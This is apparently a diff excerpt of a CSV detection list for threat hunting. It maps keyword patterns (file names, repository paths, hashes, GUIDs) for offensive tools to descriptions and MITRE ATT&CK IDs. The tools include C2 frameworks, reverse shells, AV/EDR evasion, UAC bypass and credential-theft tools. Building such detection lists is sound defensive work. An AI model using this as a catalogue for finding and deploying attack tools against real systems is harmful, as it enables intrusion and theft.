+"*aux/msf/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*aux/persistence.rc","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*aux/privilege_escalation.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*aux/Start-Webserver.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*auxiliary/crawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*auxiliary/sqli/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*av_hips_executables.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*avast_memory_dump.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*avet-master.zip*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*avflagged.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z"
+"*avrdude -c usbasp -p m328p -U flash:w:avr.hex*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*avred-main.zip*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z"
+"*av-update-urls.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z"
+"*awesome-cve-poc*","offensive_tool_keyword","POC","list of poc exploitation for nown CVE","T1210 - T1583 - T1586 - T1589 - 
T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/qazbnm456/awesome-cve-poc","1","1","N/A","N/A","10","3159","741","2022-01-04T19:07:43Z","2017-02-02T06:43:14Z"
+"*Awesome-Hacking*","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","10","69666","8680","2023-08-08T10:17:21Z","2016-03-30T15:47:10Z"
+"*Awesome-Hacking-Resources*","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tools","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","10","13938","2049","2022-08-22T09:10:41Z","2017-10-10T19:09:18Z"
+"*awesome-osint*","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. 
publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","10","14096","2404","2023-10-04T14:37:06Z","2016-11-30T13:26:11Z"
+"*awesome-pentest*","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","10","19309","4319","2023-09-19T03:06:47Z","2014-08-03T23:13:53Z"
+"*awesome-pentest-cheat-sheets*","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","10","3508","755","2023-08-04T12:41:53Z","2016-11-29T00:00:18Z"
+"*awesome-scapy*","offensive_tool_keyword","awesome-scapy","A Python tool and library for low level packet creation and manipulation","T1571 - T1596 - T1567 - T1569","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/secdev/awesome-scapy","1","1","N/A","N/A","2","148","29","2023-03-08T23:26:41Z","2020-02-04T12:17:35Z"
+"*awesome-static-analysis*","offensive_tool_keyword","awesome-static-analysis","This is a collection of static analysis tools and code quality checkers","T1064 - T1027 - T1029 - T1518","TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/codefactor-io/awesome-static-analysis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*awesome-web-security*","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. 
Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Web Attacks","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","10","10124","1610","2023-09-07T06:54:29Z","2017-01-29T16:50:21Z"
+"*awesome-windows-domain-hardening*","offensive_tool_keyword","awesome-windows-domain-hardening","A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools","T1563 - T1059 - T1547 - T1057 - T1574","TA0002 - TA0008 - TA0003 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/PaulSec/awesome-windows-domain-hardening","1","0","N/A","N/A","10","1665","280","2020-01-07T19:56:18Z","2017-02-19T19:20:38Z"
+"*awk_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*aws configure --profile exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*awsloot.py *","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z"
+"*axcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*aydinnyunus/PassDetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z"
+"*azfvgayqKwtFApcvyRedpUXculaeCCGA*","offensive_tool_keyword","SetProcessInjection","alternate 
technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z"
+"*Azure-AccessPermissions.ps1*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z"
+"*Azure-AccessPermissions-master*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z"
+"*AzureAD AutoLogon Brute*","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","0","N/A","N/A","1","96","22","2023-02-17T20:11:27Z","2021-10-01T05:20:25Z"
+"*AzureAD_Autologon_Brute*","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","1","N/A","N/A","1","96","22","2023-02-17T20:11:27Z","2021-10-01T05:20:25Z"
+"*azuread_decrypt_msol_*.ps1*","offensive_tool_keyword","powershell","method of dumping the MSOL 
service account (which allows a DCSync) used by Azure AD Connect Sync","T1003.006","TA0006","N/A","N/A","Credential Access","https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*AzureADLateralMovement*","offensive_tool_keyword","AzureADLateralMovement","AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users. Computers. Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing lateral movement graph data compatible with Bloodhound 2.2.0","T1074 - T1075 - T1076","TA0008 - TA0009 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/talmaor/AzureADLateralMovement","1","1","N/A","N/A","2","111","21","2022-12-08T06:44:48Z","2019-06-22T06:13:28Z"
+"*AzureADRecon.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
+"*AzureC2Relay.zip*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
+"*AzureC2Relay-main*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
+"*AzureHound.ps1*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*azurehound/v2*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*-b bleeding-jumbo*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*b23r0/Heroinn*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*b23r0/rsocx*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
+"*b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*b2xtranslator.xls.csproj*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
+"*B374K*index.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z"
+"*b3rito*yodo*","offensive_tool_keyword","yodo","This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. 
","T1068 - T1078 - T1529","TA0004 - TA0008","N/A","N/A","Exploitation tools","https://github.com/b3rito/yodo","1","1","N/A","N/A","3","202","34","2017-02-28T15:38:13Z","2016-11-13T21:02:03Z"
+"*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z"
+"*b4ldr/nse-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*b4rtik/RedPeanut*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*b4rtik/RedPeanut*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1095 - T1071.004","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*B5627919-4DFB-49C6-AC1B-C757F4B4A103*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z"
+"*B64_ENCODED_PAYLOAD_UUID*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*b64encode*.:::-989-:::.*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*b64payloadgen.sh*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation 
tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z"
+"*b64stager*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*B651A53C-FAE6-482E-A590-CA3B48B7F384*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
+"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
+"*b7671f125bb2ed21d0476a00cfaa9ed6*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
